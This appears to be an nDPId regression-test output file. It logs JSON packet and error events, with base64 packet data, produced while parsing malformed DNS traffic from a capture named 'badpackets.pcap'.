00762{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":363,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAEgADIR1DahNyACzLpQ5QA1FAoM2VerW6eEEAABAAYABAANA3d3dwNvcGMEbmNlcARub2FhA2dvdgAAAQABwAwABQABAAABLAAJBm9yaWdpbsAQwAwALgABAAABLAEhAAUFBQAAASxZK4tpWSJQ6VBkBG5jZXAEbm9hYQNnb3YAvM3K1OBR2VQQj4QVOGZxr6WG5B4+fABWkfGP1KGkGFsR4zOi7Eo7vmr2TJiaR66HfSMoitVNm4kwmQeusE1J+sPLARPh02h5Z1H+HsQ2b48KB6bVXbum1BeZX4yX1eoeScXJkBrFAe8F6pDF+Ml8UnuCbXzf+\/NtRUw9ZGk\/b8n+GLS5YEkLV6tINZ1NF7znVhYpo87DIH1d72melFmv8f65eH1mu6AzkUXSI502HCpox0\/KLdxxAP64c2LL03iQVYlgYQmiBnMT8YejrLi9PuDdsHa5wauH"} 00748{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":363,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAEgADIR1DahNyACzLpQ5QA1FAoM2VerW6eEEAABAAYABAANA3d3dwNvcGMEbmNlcARub2FhA2dvdgAAAQABwAwABQABAAABLAAJBm9yaWdpbsAQwAwALgABAAABLAEhAAUFBQAAASxZK4tpWSJQ6VBkBG5jZXAEbm9hYQNnb3YAvM3K1OBR2VQQj4QVOGZxr6WG5B4+fABWkfGP1KGkGFsR4zOi7Eo7vmr2TJiaR66HfSMoitVNm4kwmQeusE1J+sPLARPh02h5Z1H+HsQ2b48KB6bVXbum1BeZX4yX1eoeScXJkBrFAe8F6pDF+Ml8UnuCbXzf+\/NtRUw9ZGk\/b8n+GLS5YEkLV6tINZ1NF7znVhYpo87DIH1d72melFmv8f65eH1mu6AzkUXSI502HCpox0\/KLdxxAP64c2LL03iQVYlgYQmiBnMT8YejrLi9PuDdsHa5wauH"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":8,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":329,"global_ts_msec":1495451113448} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":329,"global_ts_msec":1495451113448}
01882{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1194,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAIgADIR1DWhNyACzLpQ5QA1\/wMKUGaWU+KEEAABAAIABAANA3d3dw9saWdodG5pbmdzYWZldHkEbm9hYQNnb3YAAAEAAcAMAAEAAQAAASwABIxaccjADAAuAAEAAAEsARwAAQUEAAABLFkri31ZIlD9PnMEbm9hYQNnb3YAFBTQGedUPGXlY8bN43JvkPLP\/vLkCv4PmFD+Yp\/wKTn0+3B8hqXsIbo6jgqCi3hM+7l3yndT6nZEOODHtVyiul17+C7883eqnN76iy6lo9R1eEKHDTvsvSdJsQx2dFH5NYDWOOjTdL3jybIGoJFlbIi+hHfzKdzFb0fO0kDYAdFs0mGEVvk\/ydoCnsE67n5RXLgALUI8enDF8d5JUZ3gz4Jmmium7SfonREBNj5MfQvR1R1JvVYPQQEWggJtIusb+MaDn2Gu7eaN7\/yF8WIh6HnwxWN7Z+YBGUTnTr0qXbOrrAMUycgB\/+tQ+zRqQIpZcUyO0tGVISl48WAUZAKbu8BcAAIAAQABUYAACAVucy1td8BcwFwAAgABAAFRgAAIBW5zLW53wFzAXAACAAEAAVGAAAcEbnMtZcBcwFwALgABAAFRgAEcAAIFAgABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AH\/\/EM5XxGUAJzS0k3FL5gqwtJA4FBuTo0uxBkbdgNOM7eIqyHshwuqLDq45ztJouzzqb5\/+QwdCyRboRA6YQcMyduo30hAwZBPjCwFtGtCbCO0zddpUh\/DZBFgSPh2dFJqb9c9JuhHoz3+E4Y9URJn+5DpaoXNsnl89Rx6siUb+Rihm7C+Vk315amYja69lUQmg3PNcdUVXF76DLNDZ9f0J\/NtTrjCtrMqxXjzjQDEOf1LyNKCNPvCsDV8BtRjU3VnXwwNw9fAKyA0zjlIJMDcZHgtkbmrTB9mFGy8tMxbqfFpB+6mG8tYtHiQWLDq6x9iFxvHJ7caHhZ1nCy6pTLXBmgABAAEAAVGAAASMWiHtwZoAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8FyAAEAAQABUYAABIysEe3BcgAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wYYAAQABAAFRgAAEoTcgAsGGABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBmgAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GaAC4AAQABUYAB"} 01868{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1194,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAIgADIR1DWhNyACzLpQ5QA1\/wMKUGaWU+KEEAABAAIABAANA3d3dw9saWdodG5pbmdzYWZldHkEbm9hYQNnb3YAAAEAAcAMAAEAAQAAASwABIxaccjADAAuAAEAAAEsARwAAQUEAAABLFkri31ZIlD9PnMEbm9hYQNnb3YAFBTQGedUPGXlY8bN43JvkPLP\/vLkCv4PmFD+Yp\/wKTn0+3B8hqXsIbo6jgqCi3hM+7l3yndT6nZEOODHtVyiul17+C7883eqnN76iy6lo9R1eEKHDTvsvSdJsQx2dFH5NYDWOOjTdL3jybIGoJFlbIi+hHfzKdzFb0fO0kDYAdFs0mGEVvk\/ydoCnsE67n5RXLgALUI8enDF8d5JUZ3gz4Jmmium7SfonREBNj5MfQvR1R1JvVYPQQEWggJtIusb+MaDn2Gu7eaN7\/yF8WIh6HnwxWN7Z+YBGUTnTr0qXbOrrAMUycgB\/+tQ+zRqQIpZcUyO0tGVISl48WAUZAKbu8BcAAIAAQABUYAACAVucy1td8BcwFwAAgABAAFRgAAIBW5zLW53wFzAXAACAAEAAVGAAAcEbnMtZcBcwFwALgABAAFRgAEcAAIFAgABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AH\/\/EM5XxGUAJzS0k3FL5gqwtJA4FBuTo0uxBkbdgNOM7eIqyHshwuqLDq45ztJouzzqb5\/+QwdCyRboRA6YQcMyduo30hAwZBPjCwFtGtCbCO0zddpUh\/DZBFgSPh2dFJqb9c9JuhHoz3+E4Y9URJn+5DpaoXNsnl89Rx6siUb+Rihm7C+Vk315amYja69lUQmg3PNcdUVXF76DLNDZ9f0J\/NtTrjCtrMqxXjzjQDEOf1LyNKCNPvCsDV8BtRjU3VnXwwNw9fAKyA0zjlIJMDcZHgtkbmrTB9mFGy8tMxbqfFpB+6mG8tYtHiQWLDq6x9iFxvHJ7caHhZ1nCy6pTLXBmgABAAEAAVGAAASMWiHtwZoAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8FyAAEAAQABUYAABIysEe3BcgAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wYYAAQABAAFRgAAEoTcgAsGGABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBmgAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GaAC4AAQABUYAB"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":9,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1160,"global_ts_msec":1495451113710} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":9,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1160,"global_ts_msec":1495451113710}
00816{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":400,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAQgADIR1DOhNyACzLpQ5QA1Z54M\/oF1LsqEEAABAAYABAANA3d3dw9hdmlhdGlvbndlYXRoZXIDZ292AAABAAHADAAFAAEAAAB4ABwPYXZpYXRpb253ZWF0aGVyBG5jZXAEbm9hYcAgwAwALgABAAAAeAEnAAUFAwAAAHhZK4siWSJQoibZD2F2aWF0aW9ud2VhdGhlcgNnb3YANj2uOA0qhMT+eoVBqvrrykuNqwkPVt8jdEhzF2Xc5aVSTWD5VljYyQWYC5vB2Pco+JCgeS7v+6P3ExqHKmNR0+\/rk7b14BLW1\/5AmNi\/7vapdiTq7yn43bnad9VKhNoyKYZcBBZ1b9tNkBEnELdSDbcDAQG053jlJWYvGHyMMJCHtDL+CPBtpJodRAacY+oZWSnBeiVMlLUCIdwUfsdnq5J46wTjS8+g3ZKLn4UR1XowHnaGOySsUz9hWM4CwtpTsVExgrAuWZ3ZCQmSQcr07tJKgCI7moO7D0IOvF0jbYwvdg=="} 00802{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":400,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAQgADIR1DOhNyACzLpQ5QA1Z54M\/oF1LsqEEAABAAYABAANA3d3dw9hdmlhdGlvbndlYXRoZXIDZ292AAABAAHADAAFAAEAAAB4ABwPYXZpYXRpb253ZWF0aGVyBG5jZXAEbm9hYcAgwAwALgABAAAAeAEnAAUFAwAAAHhZK4siWSJQoibZD2F2aWF0aW9ud2VhdGhlcgNnb3YANj2uOA0qhMT+eoVBqvrrykuNqwkPVt8jdEhzF2Xc5aVSTWD5VljYyQWYC5vB2Pco+JCgeS7v+6P3ExqHKmNR0+\/rk7b14BLW1\/5AmNi\/7vapdiTq7yn43bnad9VKhNoyKYZcBBZ1b9tNkBEnELdSDbcDAQG053jlJWYvGHyMMJCHtDL+CPBtpJodRAacY+oZWSnBeiVMlLUCIdwUfsdnq5J46wTjS8+g3ZKLn4UR1XowHnaGOySsUz9hWM4CwtpTsVExgrAuWZ3ZCQmSQcr07tJKgCI7moO7D0IOvF0jbYwvdg=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":10,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":366,"global_ts_msec":1495451113809} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":10,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":366,"global_ts_msec":1495451113809}
00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAUgADIR1DKhNyACzLpQ5QA1J78LqfTQ7QyEEAABAAQABAAND2F2aWE="} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAUgADIR1DKhNyACzLpQ5QA1J78LqfTQ7QyEEAABAAQABAAND2F2aWE="}
00246{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","size":59,"expected":60,"global_ts_msec":1495451113881} 00232{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","size":59,"expected":60,"global_ts_msec":1495451113881}
00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAUgADIR1DKhNyACzLpQ5QA1J78LqfTQ7QyEEAABAAQABAAND2F2aWE="} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAUgADIR1DKhNyACzLpQ5QA1J78LqfTQ7QyEEAABAAQABAAND2F2aWE="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":25,"global_ts_msec":1495451113881} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":11,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":25,"global_ts_msec":1495451113881}
00346{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1ggADURSICMrBHtzLpQ5QA156AF2iNRhq2EEAABAAUAAA=="} 00332{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1ggADURSICMrBHtzLpQ5QA156AF2iNRhq2EEAABAAUAAA=="}
00246{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","size":52,"expected":60,"global_ts_msec":1495451113931} 00232{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","size":52,"expected":60,"global_ts_msec":1495451113931}
00346{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1ggADURSICMrBHtzLpQ5QA156AF2iNRhq2EEAABAAUAAA=="} 00332{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1ggADURSICMrBHtzLpQ5QA156AF2iNRhq2EEAABAAUAAA=="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1495451113931} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":12,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1495451113931}
01886{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":13,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1193,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs9cgADgR3VKMWiHtzLpQ5QA1zoEKT2TtZcOEEAABAAIABAANA2xiMwRub2RjBG5vYWEDZ292AAABAAHADAABAAEAAAJYAASMWusrwAwALgABAAACWAEhAAEFBAAAAlhZK4uEWSJRBKt+BG5vZGMEbm9hYQNnb3YAhdURPDXBvcbzg1l\/P4qdc3ehRb89ofPJw8vL9RtggwAs8+7Az1qJ5M1Ux+8oZ8zHN5D0+c3BNJjQUPVveXspLDCZdxRFo+1RK\/tIlQre9Z6oXyBunsD3VON8J6JqaO9QLW\/+N+v0+3k4JQ9jEXRD+gylLnNEC4jSZM\/eEVcWh8\/Z\/hQiQb73n\/IE05pfqtTEC1C28x4rjMLnWyPcsUNmAQ1wIIVqzpP6A5VTnvp4RsDzlI9MxhvYxC13eFkguAyj4PpKGJ96o+9WpCrhjrZ5Qe97GjxQ4mnxF+La4DD1K7LlHpU2xfdLMaXTNnb3xrtp8tFG6AyME9mAN3ydsa2necBRAAIAAQAAAlgACAVucy1td8BWwFEAAgABAAACWAAHBG5zLWXAVsBRAAIAAQAAAlgACAVucy1ud8BWwFEALgABAAACWAEhAAIFAwAAAlhZK4uEWSJRBKt+BG5vZGMEbm9hYQNnb3YAPu1CKNIp6mLVE1SewqKYDKAuMQAxscJGLV3f6RN5\/1\/zVgPiH7\/AAxiJPf5SqJZzB9ypQ5Q0SJU+u+qo4UNT2A9ZikHLsvZpu3XY7qllQDLKzFsdAlym\/205od0dRRYpJQQB+XO+nZdpRMc7hCOpc4LOfHHMxA20k1GcxwGN4I6+Yn7DCzd2AzmEcNA6sRAh18oRWpULvUa3Zs5aU9AnCawyL0iB3kXc34Hs5uavwPC1Ojau\/6b8vUkP2tuAEGoEy3ndP2uce\/kL5JrjxLYplDVGCuFeAhL5JD4BC1aJIZENCvxRzhQduD0s4HR+6oKQ1lWxPgH7SZ2ACg0k6rI408GAAAEAAQABUYAABIxaIe3BgAAcAAEAAVGAABAmEAAggACMAAAAAAAAAAI3wWwAAQABAAFRgAAEjKwR7cFsABwAAQABUYAAECYQACCIAIwAAAAAAAAAAjfBkwABAAEAAVGAAAShNyACwZMAHAABAAFRgAAQJhAAIIwAjAAAAAAAAAAAAsGAAC4AAQABUYABHAABBQMAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgAdPG7ehO6IW4WIIulOX8wrz0E30kEaN8pVRkAXeBkIqEzDHfgYVK0sdZ5efJzSOnPqgHdQqhZhaojOXm4uaRNV0BM7TnAaFGReahEW+oclDj1FD6kFM2+O9+xmO3izFYVoFfp1wzvVgLlshXbzWEUiyetInv1BKKFIEeJ5LL23lhMaUXksImKM0RYQcljEMgPUzNr61cp01clYduRCFDBE8koZf3WOqAU+XPiGZ+N7vs+u0ppQnyHl4Ckwf6Bo1ew0W\/NXecH7qQZVe\/ZVZVdU9cjdfMwVrwIodtisUZ3ssnh\/k8UHvbkkIHFNDgp4Q64ETRZdWoT1WgrW5igHg8ArwYAALgABAAFRgAE="} 01872{"packet_event_id":1,"packet_event_name":"packet","packet_id":13,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1193,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs9cgADgR3VKMWiHtzLpQ5QA1zoEKT2TtZcOEEAABAAIABAANA2xiMwRub2RjBG5vYWEDZ292AAABAAHADAABAAEAAAJYAASMWusrwAwALgABAAACWAEhAAEFBAAAAlhZK4uEWSJRBKt+BG5vZGMEbm9hYQNnb3YAhdURPDXBvcbzg1l\/P4qdc3ehRb89ofPJw8vL9RtggwAs8+7Az1qJ5M1Ux+8oZ8zHN5D0+c3BNJjQUPVveXspLDCZdxRFo+1RK\/tIlQre9Z6oXyBunsD3VON8J6JqaO9QLW\/+N+v0+3k4JQ9jEXRD+gylLnNEC4jSZM\/eEVcWh8\/Z\/hQiQb73n\/IE05pfqtTEC1C28x4rjMLnWyPcsUNmAQ1wIIVqzpP6A5VTnvp4RsDzlI9MxhvYxC13eFkguAyj4PpKGJ96o+9WpCrhjrZ5Qe97GjxQ4mnxF+La4DD1K7LlHpU2xfdLMaXTNnb3xrtp8tFG6AyME9mAN3ydsa2necBRAAIAAQAAAlgACAVucy1td8BWwFEAAgABAAACWAAHBG5zLWXAVsBRAAIAAQAAAlgACAVucy1ud8BWwFEALgABAAACWAEhAAIFAwAAAlhZK4uEWSJRBKt+BG5vZGMEbm9hYQNnb3YAPu1CKNIp6mLVE1SewqKYDKAuMQAxscJGLV3f6RN5\/1\/zVgPiH7\/AAxiJPf5SqJZzB9ypQ5Q0SJU+u+qo4UNT2A9ZikHLsvZpu3XY7qllQDLKzFsdAlym\/205od0dRRYpJQQB+XO+nZdpRMc7hCOpc4LOfHHMxA20k1GcxwGN4I6+Yn7DCzd2AzmEcNA6sRAh18oRWpULvUa3Zs5aU9AnCawyL0iB3kXc34Hs5uavwPC1Ojau\/6b8vUkP2tuAEGoEy3ndP2uce\/kL5JrjxLYplDVGCuFeAhL5JD4BC1aJIZENCvxRzhQduD0s4HR+6oKQ1lWxPgH7SZ2ACg0k6rI408GAAAEAAQABUYAABIxaIe3BgAAcAAEAAVGAABAmEAAggACMAAAAAAAAAAI3wWwAAQABAAFRgAAEjKwR7cFsABwAAQABUYAAECYQACCIAIwAAAAAAAAAAjfBkwABAAEAAVGAAAShNyACwZMAHAABAAFRgAAQJhAAIIwAjAAAAAAAAAAAAsGAAC4AAQABUYABHAABBQMAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgAdPG7ehO6IW4WIIulOX8wrz0E30kEaN8pVRkAXeBkIqEzDHfgYVK0sdZ5efJzSOnPqgHdQqhZhaojOXm4uaRNV0BM7TnAaFGReahEW+oclDj1FD6kFM2+O9+xmO3izFYVoFfp1wzvVgLlshXbzWEUiyetInv1BKKFIEeJ5LL23lhMaUXksImKM0RYQcljEMgPUzNr61cp01clYduRCFDBE8koZf3WOqAU+XPiGZ+N7vs+u0ppQnyHl4Ckwf6Bo1ew0W\/NXecH7qQZVe\/ZVZVdU9cjdfMwVrwIodtisUZ3ssnh\/k8UHvbkkIHFNDgp4Q64ETRZdWoT1WgrW5igHg8ArwYAALgABAAFRgAE="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":13,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1159,"global_ts_msec":1495451113998} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":13,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1159,"global_ts_msec":1495451113998}
01879{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":14,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1kgADURSH+MrBHtzLpQ5QA18VcKSC9N\/PmEEAABAAIABAANC2Zsb29kc2FmZXR5BG5vYWEDZ292AAABAAHADAABAAEAAAEsAASMWnHIwAwALgABAAABLAEcAAEFAwAAASxZK4t9WSJQ\/T5zBG5vYWEDZ292AI8NxE24xoB5Eg9dMdW2i2Wbnp7WAjJSEPfx6q6WNvQlvElWxcN5ImSIEBkCrx36XB+4y7FQRSHAcJfGmrEujeIG4vm2iak4\/iZ8q6dmad9UZqsYw7xMfUiMET9ynUM9tfbf26FoVrC7jqPoXd\/CLZ2MXGmkMAEGsqydhYm\/5Owhr1bdMagm+9i4eFaCOhOwLA5ytPfBpqddYO4P6KxfzWofdME7xL026plG7g0aOG4GcHKq2yCkGN\/td2KW3STw7Yn3EkgDcCQ9GkTH0mNpchsIxkxjSxGtSeHI3BNNToabK8Bt8I+qEmB2t+Dviv1HzjwGjXetcCij9X+FGH0VoGjAVAACAAEAAVGAAAgFbnMtbXfAVMBUAAIAAQABUYAACAVucy1ud8BUwFQAAgABAAFRgAAHBG5zLWXAVMBUAC4AAQABUYABHAACBQIAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgB\/\/xDOV8RlACc0tJNxS+YKsLSQOBQbk6NLsQZG3YDTjO3iKsh7IcLqiw6uOc7SaLs86m+f\/kMHQskW6EQOmEHDMnbqN9IQMGQT4wsBbRrQmwjtM3XaVIfw2QRYEj4dnRSam\/XPSboR6M9\/hOGPVESZ\/uQ6WqFzbJ5fPUcerIlG\/kYoZuwvlZN9eWpmI2uvZVEJoNzzXHVFVxe+gyzQ2fX9CfzbU64wrazKsV4840AxDn9S8jSgjT7wrA1fAbUY1N1Z18MDcPXwCsgNM45SCTA3GR4LZG5q0wfZhRsvLTMW6nxaQfuphvLWLR4kFiw6usfYhcbxye3Gh4WdZwsuqUy1wZIAAQABAAFRgAAEjFoh7cGSABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBagABAAEAAVGAAASMrBHtwWoAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8F+AAEAAQABUYAABKE3IALBfgAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwZIALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBkgAuAAEAAVGAAQ=="} 